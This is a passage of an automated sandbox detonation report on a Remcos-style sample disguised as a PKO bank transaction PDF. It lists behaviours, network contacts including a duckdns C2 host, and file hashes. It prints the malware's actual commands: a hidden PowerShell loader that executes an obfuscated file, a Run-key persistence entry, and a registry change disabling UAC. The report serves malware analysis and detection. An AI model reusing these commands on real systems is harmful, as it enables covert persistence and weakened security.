| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3220 set thread context of 2468 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3220 set thread context of 1760 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 3220 set thread context of 3700 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe
"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\dtgxucotnzmfifzebwqmlwxcdtnqyepc"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\nnmp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\yqrivmj"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 85.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 238.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a458386d9.duckdns.org | udp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| US | 8.8.8.8:53 | 73.50.76.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.80.50.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\nsDialogs.dll
| MD5 | 1c8b2b40c642e8b5a5b3ff102796fb37 |
| SHA1 | 3245f55afac50f775eb53fd6d14abb7fe523393d |
| SHA256 | 8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c |
| SHA512 | 4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57 |
C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\BgImage.dll
| MD5 | 521df745a41f0b8164ffd01717cacbba |
| SHA1 | dc7a9eacfbeb1fae52091da5e80db6cb1b6bce74 |
| SHA256 | dbf91707fa157603bea025a6411cdcb497ab11262c9c18b14dc431a45aa17c0b |
| SHA512 | c5b1ba062872a8f534e2f0eac57fc3c0d8be9cda79605d86566d67260ba5477444a0ddfed1838b4fb14c677e5342c8419a88fcd38147dbaa36ac1f9e00c52bbe |
C:\Users\Admin\AppData\Local\Temp\nsqC871.tmp\UserInfo.dll
| MD5 | acbda33dd5700c122e2fe48e3d4351fd |
| SHA1 | 2c154baf7c64052ee712b7cdf9c36b7697dd3fc8 |
| SHA256 | 943b33829f9013e4d361482a5c8981ba20a7155c78691dbe02a8f8cd2a02efa0 |
| SHA512 | d090adf65a74ac5b910b18bb67e989714335e7b4778cd771cff154d7186351a1bebbc7103cca849bdfa2709c991947ffff6c1d8fdf16a74f4dfb614bce3ff6fd |
memory/3220-24-0x000000007336E000-0x000000007336F000-memory.dmp
memory/3220-25-0x0000000004AA0000-0x0000000004AD6000-memory.dmp
memory/3220-26-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-27-0x00000000052A0000-0x00000000058C8000-memory.dmp
memory/3220-28-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-29-0x0000000005190000-0x00000000051B2000-memory.dmp
memory/3220-30-0x0000000005230000-0x0000000005296000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lhnqlb3m.fum.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3220-33-0x00000000059D0000-0x0000000005A36000-memory.dmp
memory/3220-37-0x0000000005AC0000-0x0000000005E14000-memory.dmp
memory/3220-42-0x00000000060E0000-0x00000000060FE000-memory.dmp
memory/3220-43-0x0000000006120000-0x000000000616C000-memory.dmp
memory/3220-44-0x0000000006650000-0x00000000066E6000-memory.dmp
memory/3220-46-0x00000000072D0000-0x00000000072F2000-memory.dmp
memory/3220-45-0x0000000006600000-0x000000000661A000-memory.dmp
memory/3220-47-0x00000000078B0000-0x0000000007E54000-memory.dmp
C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San
| MD5 | bf1ebfd1285dd7ef43a587e9f51a8e33 |
| SHA1 | 1dede4026611e9f40c91d9bbe406a06b2fd8bfa4 |
| SHA256 | de1db1c0a065f580b4fe878c5b363933e45ec7f0c06118d29b6d167af24189ff |
| SHA512 | 3b7b11a8989a0b46e4091c8e4c81e71a2454fc9fba77618d844653d548ecd59a2c8b8fce3338fa499ca84da8664f7e34f355ab8b18e3507598f5f63dd3a80389 |
memory/3220-49-0x00000000084E0000-0x0000000008B5A000-memory.dmp
memory/3220-51-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-52-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-53-0x0000000073360000-0x0000000073B10000-memory.dmp
C:\Users\Admin\AppData\Local\kilns\Unobtainably\Polemoniaceae11.Non
| MD5 | afc1982fff88592a55312010cfc773c6 |
| SHA1 | c57e918c5149ca9c2a331a78ecef84ffc667feb7 |
| SHA256 | 02a71af4b95cf275ba0430022e9c2665bd1e4ddb3177202c1c3059901eefd4f0 |
| SHA512 | f4acf46244cb0115e0666a631af6dd2e7400478103cd9c152e48307a2239108e7e6bf3b39467747b3efa8b0fbdc59216ad6a26ec5587c19bb56fb4512233117e |
memory/3220-55-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-56-0x0000000008B60000-0x000000000D71C000-memory.dmp
memory/3220-58-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-57-0x000000007336E000-0x000000007336F000-memory.dmp
memory/3220-60-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-61-0x0000000073360000-0x0000000073B10000-memory.dmp
memory/3220-74-0x0000000008B60000-0x000000000D71C000-memory.dmp
memory/2468-76-0x0000000000400000-0x0000000000478000-memory.dmp
memory/1760-77-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2468-80-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3700-84-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3700-83-0x0000000000400000-0x0000000000424000-memory.dmp
memory/3700-82-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1760-81-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1760-79-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2468-78-0x0000000000400000-0x0000000000478000-memory.dmp
memory/3220-90-0x00000000067E0000-0x00000000067F9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dtgxucotnzmfifzebwqmlwxcdtnqyepc
| MD5 | 60e30555becdb968406edb87fff512ef |
| SHA1 | 65551417f6371c40e6d5dab38fe87ab634f9446e |
| SHA256 | 9e347aa1a363532c72d7728abe1afdc48b9418fae8cbf8bcbc50c9c22dfefa57 |
| SHA512 | cbe1aebf171b54f481028208aa85fb04145cc40772cc30e67107caa5cc70c73f274da362766f125093c1fab1416c687744e53e0f7c30b6ead866c6f6ba671449 |
memory/3220-94-0x00000000067E0000-0x00000000067F9000-memory.dmp
memory/3220-93-0x00000000067E0000-0x00000000067F9000-memory.dmp
memory/3220-100-0x0000000073360000-0x0000000073B10000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | 434c9f981eadaffbec7aa8743e23e311 |
| SHA1 | d9454d2aaf51e2b1f4660c28006954234963b962 |
| SHA256 | 2668d8f69a8ada3b2740a5ac2fe5ed1c8fba11a658c62647aa98a526870ba708 |
| SHA512 | 60a9589eb71556df85a12b633103d7b5246685f353a11ed5aeb8a7cca926e7d193ebb176a770d817b9df16dba12ea1381dc759c888ca3776f5aad8b7b2c7e976 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win10v2004-20240709-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3504 wrote to memory of 4604 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3504 wrote to memory of 4604 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3504 wrote to memory of 4604 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win7-20240705-en
Max time kernel
117s
Max time network
118s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 220
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win10v2004-20240709-en
Max time kernel
94s
Max time network
132s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2420 wrote to memory of 2224 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2420 wrote to memory of 2224 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2420 wrote to memory of 2224 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\UserInfo.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2224 -ip 2224
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 624
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win7-20240705-en
Max time kernel
120s
Max time network
121s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1224 -s 240